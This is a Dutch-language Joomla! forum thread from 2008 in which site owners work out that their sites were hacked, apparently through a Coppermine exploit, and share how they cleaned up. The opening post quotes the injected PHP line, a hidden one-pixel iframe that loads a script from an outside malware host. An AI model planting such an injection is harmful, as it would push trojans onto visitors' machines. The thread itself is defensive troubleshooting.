website gehacked

pjotr · Post by **pjotr** » Mon Apr 07, 2008 9:08 am

vanmorgen kreeg ik allerlei foutmeldingen op één van mijn sites. In de statusbalk onderaan de browser zag ik een link: http://cdpuvbhfzz.com/adv598.php.
Ik ben bang dat de site is gehacked. Ook via admin kan ik niet bij de site komen.

Na wat onderzoek (via FTP) zag ik dat in verschillende files (index.php, configuration.php, globals.php (en wellicht nog veel meer files) als laatste regel is opgenomen:

<?php echo '<iframe src="http://cdpuvbhfzz.com/dl/adv598.php" width=1 height=1></iframe>'; ?>

Volgens mij is dit de hack. Kan iemand vertellen of mijn veronderstelling juist is voordat ik al mijn files ga nazoeken en aanpassen?

dam-man · Post by **dam-man** » Mon Apr 07, 2008 9:29 am

Dit lijkt er wel op jah...

Welke versie draaide je bij deze site?

pjotr · Post by **pjotr** » Mon Apr 07, 2008 9:37 am

dam-man wrote:Dit lijkt er wel op jah...
Welke versie draaide je bij deze site?

De laatste versie 1.015

Ik weet in ieder geval wat ik vanavond kan gaan doen, ik zal mij wel niet vervelen.

Bedankt voor je reactie.

pjotr · Post by **pjotr** » Mon Apr 07, 2008 10:03 am

Nog even een aanvullende vraag:
Volgens mijn provider staan de beveiligingsinstellingen van mijn site niet optimaal (een paar mappen zouden op 777 staan). Dit zou kunnen omdat ik wel eens wat problemen heb gehad met installeren, waarschijnlijk heb ik ze niet allemaal weer teruggezet

Maar de files met de betreffende regel staan op 644. Volgens mij is dit standaard voor deze files. Ik dacht dat een buitenstaander dan niets kon wijzigen in de file? Hoe kunnen de regels dan zijn toegevoegd?

aanvulling: Nog eens met mijn provider gebeld.
Het bleek dat ook het fotoalbum (Coppermine), dat middels de installatietool van de provider was geïnstalleerd, gehacked was. Ook bij dit programma talloze 644-files met de betreffende regels.
Volgens de provider is het met bepaalde 'tools' mogelijk 644-bestanden toch te wijzigen. Hier zou weinig aan te doen zijn.
Iemand een ander idee?

Ik heb gelukkig nog wel backups (jammer alleen dat deze een week oud zijn), maar je heb er toch weer een hoop werk aan en als de reactie van mijn provider juist is kan het dus vaker voorkomen.

pjotr · Post by **pjotr** » Mon Apr 07, 2008 5:49 pm

Probleem is opgelost. Wat belangrijk is een (recente) backup toch.
Ik maakte slechts één keer per 2 à 3 weken een backup. Ik ga dit toch maar wat vaker doen.

user deleted · Post by **user deleted** » Mon Apr 07, 2008 6:46 pm

Hoi Peter,

Is het ook duidelijk geworden hoe en/of waar ze als eerste toegang toe hebben gekregen? Uiteraard ben ik nieuwsgierig of dit de Core is geweest, dat zou betekenen dat er ergens een lek zit en dat dit directe aandacht vereist.

Mocht je nog bij de server logs kunnen zou ik geintereseerd zijn om een kopie ervan in te zien als je daarmee akkoord gaat uiteraard.

pjotr · Post by **pjotr** » Mon Apr 07, 2008 6:58 pm

Robin,
ik zou je natuurlijk graag helpen. Waar zou ik de server-logs kunnen vinden? Of moet ik dit bij de provider opvragen?
Eventueel wil ik je wel mijn inloggegevens mailen als dit je kan helpen.

user deleted · Post by **user deleted** » Tue Apr 08, 2008 7:06 am

Hoi,

Alvast dank voor de hulp. De logs zouden via een control panel bereikbaar kunnen zijn, je zou daar even kunnen kijken. Anders kan de hosting er inderdaad bij.

Ivo · Post by **Ivo** » Tue Apr 08, 2008 7:19 pm

Ik heb dit probleem ook ineens sinds vanavond. Ook Iframes en een pagina die naar cpuvbhfzz.com zoekt.

Wat kan ik hieraan doen? Moet ik echt opnieuw beginnen met een schone installatie/backup?

Ik kan trouwens wel bij mijn admin-panel...

Ivo · Post by **Ivo** » Tue Apr 08, 2008 7:38 pm

Ik zag op de coppermine forums het volgende topic: http://forum.coppermine-gallery.net/ind ... .msg250153

pjotr · Post by **pjotr** » Tue Apr 08, 2008 7:40 pm

Ik dacht in het begin dat de regels slechts in een paar files voorkwamen, maar als je verder kijkt, komen ze in bijna alle php-files voor. Ik heb dus maar een backup teruggezet.

je heb dus wat te doen vanavond,
succes

Ivo · Post by **Ivo** » Tue Apr 08, 2008 8:25 pm

Het voordeel is wel dat de database en ook plaatjes niet zijn geinfecteerd. Dat scheelt al een hoop.

Bij ons is het zo dat elke file die op 08-04-2008 om 20:18u is geinfecteerd. Ik probeer nu elke file die die timestamp heeft op te sporen. Vervolgens haal ik de I-frame weg en zet ik de chmod terug naar 644. Ik heb CPG direct van de site gegooid, ik hoop dat dat voldoende is.

pjotr · Post by **pjotr** » Tue Apr 08, 2008 8:39 pm

Is Coppermine wel de oorzaak? Ik had de fotoalbums niet via een bridge aan mijn site gekoppeld, maar stond apart geïnstalleerd en werd via een menu-optie opgeroepen.

Ivo · Post by **Ivo** » Tue Apr 08, 2008 8:45 pm

Lees dat topic van hierboven maar. Ik lees overal op het net dat het een coppermine exploit is, zoek maar eens op cdpuvbhfzz.com

Ivo · Post by **Ivo** » Tue Apr 08, 2008 9:00 pm

Ik heb in een van de coppermine-mappen een file genaamd 142739_298w3.zip gevonden. Toen ik deze opende in notepad bleek dit de bewuste php-file te zijn, waarvan de code ook al in het eerder genoemde topic staat. Ik ben dus blij dat ik de CPG-map direct heb weggesmeten.

Ik heb alleen nog niet alle geinfecteerde files kunnen vinden...

Post by **pe7er** » Wed Apr 09, 2008 8:39 am

Erg handig om te voorkomen, maar om ook veiligheidsrisicos op te sporen (bijv. verkeerde permissies),
download: Joomla! Tools Suite (JTS-sa) & HISA (HISA-sa) http://extensions.joomla.org/component/ ... Itemid,35/
Het is een tool die je niet hoeft te installeren, maar via FTP in een aparte map op je site moet zetten,
en dan opstarten via je browser.

Achtergrond info (Engelstalig):
Joomla! Tools Suite v1.0 & Health, Installation and Security Audit Tool http://forum.joomla.org/viewtopic.php?t=136328

Ivo · Post by **Ivo** » Thu Apr 10, 2008 7:52 am

Ik heb alle sourcefiles van Joomla en SMF opnieuw geupload vanuit mijn laatste backup. De images, downloads en andere media heb ik laten staan. Nu draait de site weer normaal zonder exploits.

Ik heb inmiddels van mensen begrepen dat een trojan zich via onze site probeerde te laden, best serieus dus.

@ Pe7er: Bedankt, ik ga dat eens uitproberen! Zit daar toevallig ook iets van een CHMOD-tool in waarmee je snel alle files en directories de juiste rechten kunt geven?

Susanne · Post by **Susanne** » Sun Apr 13, 2008 3:18 pm

Ik had het probleem ook met een coppermine site. Ik had al een hele tijd geen updates gedaan. Dat is echt enorm belangrijk. http://forum.coppermine-gallery.net/ind ... 1.120.html
Ik kon zien dat de hack op 8 april om 20:16 uur was gedaan. Al mijn bestanden in de map van coppermine waren vervangen voor bestanden met die datum en tijd. Na het vervangen van al die bestanden voor een bestand van de laatste versie van coppermine, heb ik de hack niet meer terug gezien. Let op: in de map album staat waarschijnlijk een zip-bestand met de datum en tijd van de hack. Verwijder deze ook. Het schijnt dat de hack anders kan terug komen. Check daarna alle bestanden in alle mappen of er nog bestanden zijn met de datum en tijd van de hack. het zijn de php en html bestanden die zijn aangetast. Na deze operatie lijkt mijn galerij weer schoon. Vernieuw ook even je wachtwoorden.
Op het forum van coppermine staat een guide over hoe je moet updaten. Volg deze. Bij mij werkte het.

sc00zy · Post by **sc00zy** » Thu Apr 17, 2008 9:15 am

Mod: Verplaatst van Algemene vragen naar Offtopic forum.

The Joomla! Forum™

website gehacked

website gehacked

Re: website gehacked?

Re: website gehacked?

Re: website gehacked

Re: website gehacked

Re: website gehacked?

Re: website gehacked?

Re: website gehacked?

Re: website gehacked?

Re: website gehacked?

Re: website gehacked?

Re: website gehacked?

Re: website gehacked

Re: website gehacked

Re: website gehacked

Re: website gehacked

Re: website gehacked

Re: website gehacked

Re: website gehacked